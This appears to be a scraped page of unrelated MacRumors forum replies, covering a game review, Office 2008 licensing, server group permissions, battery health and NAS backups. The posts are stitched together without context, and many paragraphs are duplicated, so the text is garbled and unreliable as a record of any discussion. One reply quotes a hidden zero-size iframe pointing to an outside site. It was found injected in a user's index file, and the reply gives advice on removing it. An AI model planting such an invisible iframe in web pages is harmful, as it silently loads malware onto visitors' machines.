dscuber9000
Aug 9, 06:42 PM
I rented it and really liked it. It's really short so paying $60 or even $40 is completely out of the question in my opinion. Once it is a greatest hits game at $20 then there is no reason for anyone not to try it.
It really reminded me of a next-gen Resident Evil 4, even more-so than Resident Evil 5. And believe it or not, this game can actually be kind of scary in some points. The atmosphere is really well-done, but some technical short-comings (especially with the animations) keep Alan Wake from being even in the discussion of game of the year.
It really reminded me of a next-gen Resident Evil 4, even more-so than Resident Evil 5. And believe it or not, this game can actually be kind of scary in some points. The atmosphere is really well-done, but some technical short-comings (especially with the animations) keep Alan Wake from being even in the discussion of game of the year.
dotnina
Aug 20, 03:17 PM
That is so cute! Your current avatar is nice too :)
varmit
Feb 18, 02:27 PM
hope you have the band width man, that site, if found by many, could take off. Nice interface.
Jetson
May 23, 05:58 PM
MacDann
Jun 19, 06:30 PM
How many licenses does that include? More than one, I am assuming.
No. It is not the "Home and Student Edition," but the full-blown Office 2008 edition including support for Exchange Server and Automator workflows.
Only one license. The Home and Student Edition still has three licenses as a part of the package, but it's more expensive and does not have the support for Exchange server and Automator workflows.
Of course, you have to be an educator or student to qualify for Home and Student, I believe:
http://www.microsoft.com/education/eligible.mspx
MacDann
No. It is not the "Home and Student Edition," but the full-blown Office 2008 edition including support for Exchange Server and Automator workflows.
Only one license. The Home and Student Edition still has three licenses as a part of the package, but it's more expensive and does not have the support for Exchange server and Automator workflows.
Of course, you have to be an educator or student to qualify for Home and Student, I believe:
http://www.microsoft.com/education/eligible.mspx
MacDann
eastercat
May 4, 02:37 AM
Hotspot only applies to iPhone 4. 3G/3GS weren't invited to the hotspot party.
evanmarx
Jan 29, 05:57 PM
Originally posted by eyelikeart
wouldn't that have been exactly what arn was referring to?! :rolleyes:
oeahh ... yes? well ... aehhh ... e.l.a?:D
wouldn't that have been exactly what arn was referring to?! :rolleyes:
oeahh ... yes? well ... aehhh ... e.l.a?:D
Big D 51
Apr 22, 10:57 PM
Thanks for the input guys! I guess I'll just bin this one. I find it funny, so I'll just keep the binary on my iPhone, and start working on another project.
Good attitude. Keep us posted of new projects. Good luck.
Good attitude. Keep us posted of new projects. Good luck.
jMc
Oct 28, 09:30 AM
Your index file has the following code in it:
<iframe src="http://www.greppsaux.info" width=0 height=0>
The file spl.php is being downloaded from the website referenced in the iframe here. Remove the section of code above and all should be fine.
jx
EDIT: Amended code - you only need to delete the iframe reference...
<iframe src="http://www.greppsaux.info" width=0 height=0>
The file spl.php is being downloaded from the website referenced in the iframe here. Remove the section of code above and all should be fine.
jx
EDIT: Amended code - you only need to delete the iframe reference...
robbieduncan
Apr 1, 10:38 AM
I'm pretty sure it's deserialized from the main nib which is declared in the Info.plist file. But I am at work on a PC so can't check right now.
andysmith
Dec 14, 11:37 AM
That's one of the reasons why I decided to get a logitech keyboard and mouse for my iMac instead of using the Apple ones. They have extra buttons that control itunes that don't require you to have itunes as the top program.
Yes, it's the one thing I miss about my PC's keyboard. It was very handy to have media buttons at the top to control iTunes.
I prefer the Apple keyboard from the feel of the keys, though, so I'll be sticking with one of those.
I'd thought about the menubar option, but I haven't really got enough space - I have too many icons as it is:
http://img499.imageshack.us/img499/5687/screenshot141220052kson1bd.jpg
Yes, it's the one thing I miss about my PC's keyboard. It was very handy to have media buttons at the top to control iTunes.
I prefer the Apple keyboard from the feel of the keys, though, so I'll be sticking with one of those.
I'd thought about the menubar option, but I haven't really got enough space - I have too many icons as it is:
http://img499.imageshack.us/img499/5687/screenshot141220052kson1bd.jpg
Peace
Jun 14, 10:42 PM
Nice avatar but I think this one was late.
http://forums.macrumors.com/showpost.php?p=10127501&postcount=29
http://forums.macrumors.com/showpost.php?p=10127501&postcount=29
SA22C
Mar 25, 02:55 PM
Iphone standard screen - 20 icons
Android screen - 8ish icons + widgets
obviously iphone would win!
if you get an android phone and put your 20 icons on there it will be the same as the iphone.
put widgets on the iphone, and lets see how it does. xD
stop comparing apples and bananas, and hop off steve's wayng.
I'm convinced.
Well, I'm off to trade my iPhone 4 for a droid. See y'all later.
Android screen - 8ish icons + widgets
obviously iphone would win!
if you get an android phone and put your 20 icons on there it will be the same as the iphone.
put widgets on the iphone, and lets see how it does. xD
stop comparing apples and bananas, and hop off steve's wayng.
I'm convinced.
Well, I'm off to trade my iPhone 4 for a droid. See y'all later.
jwheeler
Mar 17, 10:13 PM
now I want to use it in a music video :D
Haha i had the exact same feeling... :P
Haha i had the exact same feeling... :P
machilfe.ch
Dec 31, 04:36 AM
Dear readers and admins
My question is about the "correct" setting of the user and group rights, so the following is possible. It relates to Server 10.3 and to 10.6.
Requirements:
Group 1 = "Regular user "
Group 2 = "Administration, Accounting "
User 1 and 2 belong to group 1, users 3 and 4 belong to Group 2.
User 1 & 2 must have read/write access to files and folders in Group 1, but may not have access to files and folders of group 2.
User 1 & 2 must be in a position of creation and deletion of file and directory of group 1, as if they were their own files and directories. I.e. User 2 must be in a position to delete or change files and directories that an other user of group 1 has created.
User 3 & 4 must have read and write access to files and directories of Group 1 & 2. They must be able to creating and changing such files and directories, as if they were their own files and directories. I.e. User 3 & 4 must be able to create and change files and directories which belong to user 1 & 2.
As I understand it, this can be achieved with ACL's under Server 10.4 and newer as well as with complex user- and group settings under 10.3.
Am I right there?
How does such a structure look like in 10.3?
What would such a structure look like with ACL's?
I unfortunately don't have a server 10.3 running and my 10.6 server is down due to technical problems.
Thank you in advance for your help.
All a happy new year.
Regards
Thomas Thaler
My question is about the "correct" setting of the user and group rights, so the following is possible. It relates to Server 10.3 and to 10.6.
Requirements:
Group 1 = "Regular user "
Group 2 = "Administration, Accounting "
User 1 and 2 belong to group 1, users 3 and 4 belong to Group 2.
User 1 & 2 must have read/write access to files and folders in Group 1, but may not have access to files and folders of group 2.
User 1 & 2 must be in a position of creation and deletion of file and directory of group 1, as if they were their own files and directories. I.e. User 2 must be in a position to delete or change files and directories that an other user of group 1 has created.
User 3 & 4 must have read and write access to files and directories of Group 1 & 2. They must be able to creating and changing such files and directories, as if they were their own files and directories. I.e. User 3 & 4 must be able to create and change files and directories which belong to user 1 & 2.
As I understand it, this can be achieved with ACL's under Server 10.4 and newer as well as with complex user- and group settings under 10.3.
Am I right there?
How does such a structure look like in 10.3?
What would such a structure look like with ACL's?
I unfortunately don't have a server 10.3 running and my 10.6 server is down due to technical problems.
Thank you in advance for your help.
All a happy new year.
Regards
Thomas Thaler
ComputersaysNo
Jun 4, 12:48 PM
...by drinking :D
Ulkair
Apr 26, 03:44 PM
ah! i see, i miss read the post.
S-mac-k
May 3, 04:35 PM
Guys, MBP is a week old and the battery health is 97%. Its a week old. Had 8 battery load cycles. Design capacity is 6900mAh and I'm at 6723mAh.
Normal or am I just being a freak?
And I've tried to calibrate like 3 times. Can you over calibrate? What am I to do? Rumour geniuses please inform. lol.
Normal or am I just being a freak?
And I've tried to calibrate like 3 times. Can you over calibrate? What am I to do? Rumour geniuses please inform. lol.
blevins321
Apr 27, 11:57 AM
I wrote a review about the Synology DS411j a couple of months ago. HERE (http://forums.macrumors.com/showthread.php?t=1117716&highlight=411j)is the link. Before I sold my MBP, I had my iMac and MBP both using Time Machine on it. I never had an issue with deletion of files. I had it set to a high quota though, but it never crossed 600GB on the NAS total.
Synology makes smaller NAS units that have the same software as the one I reviewed. They have both a 2-bay and a single bay. Benefit to an extra bay with another drive is that you have redundancy in case one of the drives fails. I also have a USB hard drive attached and it backs up the entire NAS twice a week.
Synology makes smaller NAS units that have the same software as the one I reviewed. They have both a 2-bay and a single bay. Benefit to an extra bay with another drive is that you have redundancy in case one of the drives fails. I also have a USB hard drive attached and it backs up the entire NAS twice a week.
katie ta achoo
Sep 9, 08:00 PM
I'm not sure about the Mac speech pronunciation.
you CAN go to m-w.com, look it up, and see how they pronounce it.
you CAN go to m-w.com, look it up, and see how they pronounce it.
King Cobra
Aug 16, 01:50 PM
All right, the following person to use the dogcow avatar for this contest has to pay jane some royalties. :D
iMeowbot
Dec 12, 08:58 AM
Camino 0.8.2 is here...
Cool. With Firefox having a tendency to go braindead in its 1.0 release, it's nice to have a stable Gecko browser for testing things.
Cool. With Firefox having a tendency to go braindead in its 1.0 release, it's nice to have a stable Gecko browser for testing things.
macman4789
Apr 23, 04:34 PM
Either use Time Machine to regularly backup your hard drive however if you're formatting you're probably not wanting to go back to what the drive was like so just use an external drive and occasionally drag over the updated itunes folder which will have all your music in.
agentbob
Sep 24, 02:10 PM
Hey all,
Tried posting in another thread but got no response so trying to open a new one.
I'm looking to buy an external enclosure + dvd-r for my macs. I've currently got a tibook 667 and an imac g5... I've had trouble in the past with an LG drive in no-name enclosure...
The macs I tried it on would see it as a dvd/cd reader, but wouldn't burn to it using patchburn nor toast. It also wouldn't boot off cds/dvds sometimes.
The new drive I'm thinking to get will be a pioneer. I'm just wondering what models/brands of enclosures people have had success with, and also if pioneer drives work fine as well.
Thanks,
Dan
Tried posting in another thread but got no response so trying to open a new one.
I'm looking to buy an external enclosure + dvd-r for my macs. I've currently got a tibook 667 and an imac g5... I've had trouble in the past with an LG drive in no-name enclosure...
The macs I tried it on would see it as a dvd/cd reader, but wouldn't burn to it using patchburn nor toast. It also wouldn't boot off cds/dvds sometimes.
The new drive I'm thinking to get will be a pioneer. I'm just wondering what models/brands of enclosures people have had success with, and also if pioneer drives work fine as well.
Thanks,
Dan
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